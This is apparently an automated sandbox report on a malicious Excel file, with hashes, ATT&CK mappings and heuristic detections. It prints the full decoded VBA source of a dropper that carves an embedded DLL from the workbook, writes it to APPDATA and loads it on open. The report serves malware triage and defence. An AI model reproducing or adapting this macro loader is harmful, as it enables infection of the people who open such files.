Office (OLE) malware analysis — malicious · 55d98e4cd503eff3

MALICIOUS

Office (OLE)

302.5 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-02-04

MD5: 944cc2e33a38a2cccd4001a2bffddcc7 SHA-1: 31af74e6a46814d6166658cd3a2ca302d962f227 SHA-256: 55d98e4cd503eff3243db49337bf57e774e23e4acbe48bd5441c64a6f3c146ca

396 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information T1027 Obfuscated Files or Information T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel file containing a Workbook_Open macro that triggers an Excel4 macro via ExecuteExcel4Macro. This macro attempts to load external DLLs ('masterbox1.dll' or 'masterbox2.dll') and displays a UserForm, indicating an attempt to download and execute a second-stage payload. The presence of an embedded PE executable and the ClamAV detection further support its malicious nature.

Heuristics 11

ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6738 bytes
SHA-256: `1c5835f84fe63f50e8e852f1478575840b5648230f538de7dc691f60838a7f2a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wbO" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" UserForm2.TextBox1.Tag = Environ("TEMP") UserForm2.TextBox2.Tag = Environ("APPDATA") ChDir (Environ("TEMP")) UserForm1.show ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If Win64 Then Public Declare PtrSafe Function Hadno Lib _ "masterbox2.dll" () As Integer Public Declare PtrSafe Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long #Else Public Declare Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long Public Declare Function Hadno Lib _ "masterbox1.dll" () As Integer #End If Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{CCFDB59B-78BC-4D12-B95A-4E2A315557C8}{7CA76751-F17D-4AE4-AB18-A73A1249E536}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() DoEvents ReplaceCurrentModule End Sub Private Sub UserForm_Initialize() Call SystemButtonSettings(Me, False) End Sub Attribute VB_Name = "Module2" Private Const GWL_STYLE = -16 Private Const WS_CAPTION = &HC00000 Private Const WS_SYSMENU = &H80000 #If VBA7 Then Private Declare PtrSafe Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long) As Long Private Declare PtrSafe Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare PtrSafe Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #Else Private Declare Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long) As Long Private Declare Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #End If Public Sub SystemButtonSettings(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FindWindowA(vbNullString, frm.Caption) windowStyle = GetWindowLong(windowHandle, GWL_STYLE) If show = False Then SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) Else SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer) Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte Dim DataArray() As Long ReDim DataArray(1 To fl) DataArray(1) = CByte(50 + 27) DataArray(2) = CByte(50 + 40) DataArray(3) = CByte(50 + 94) intFileNum = FreeFile Open s For Binary Access Read As intFileNum Dim cur As Integer cur = 1 Do While Not EOF(intFileNum) Get intFileNum, , bytTemp1 If bytTemp1 = DataArray(1) Then Get intFileNum, , bytTemp2 If bytTemp2 = DataArray(2) Then Get intFileNum, , bytTemp3 If bytTemp3 = DataArray(3) Then If cur = num Then For k = 4 To fl Get intFileNum, , bytTemp1 DataArray(k) = bytTemp1 Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close intFileNum intFileNum = FreeFile Open nm For Binary Lock Read Write As #intFileNum For i = LBound(DataArray) To UBound(DataArray) Put #intFileNum, , CByte(DataArray(i)) Next i Close #intFileNum End Sub Public Sub ReplaceCurrentModule() TempName = UserForm2.TextBox1.Tag & "\factory.xlsx" ZipName = TempName + ".zip" ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp" Dim nm As String Dim size As Long Dim num As Integer #If Win64 Then nm = UserForm2.TextBox2.Tag + "\masterbox2.dll" size = 67584 num = 2 #Else nm = UserForm2.TextBox2.Tag + "\masterbox1.dll" size = 77824 num = 1 #End If On Error Resume Next Kill ZipName Kill ZipFolder & "\oleObject*.bin" Kill nm On Error GoTo 0 DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False ActiveWorkbook.SaveAs TempName, FileFormat:=51 DoEvents ActiveWorkbook.Close DoEvents FileCopy TempName, ZipName Set oApp = CreateObject("Shell.Application") oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin") Resoration ZipFolder + "\oleObject1.bin", nm, size, num ChDir (UserForm2.TextBox2.Tag) No_Hadno = Hadno2(nm) Hadno End Sub Attribute VB_Name = "Module3" Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{550C1F9E-E17C-4586-8941-3A4A35ED4C5F}{D70A062E-B0F9-403C-8F57-B500507AF1AC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`embedded_office_00003b87.exe`	embedded-pe	Office MZ+PE at offset 0x3B87	294521 bytes
SHA-256: `241fc96dad581671cd8213a6c8606481f0dcde1a9cb8ea20ad261de2156c062d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD008E55B3/Ole10Native	156343 bytes
SHA-256: `6ec45172912e76b96041697a80a099f6b0816c480c79a915f7dcf8a4c7ce1e6f`

Open this report in the interactive analyzer, or submit your own file for analysis.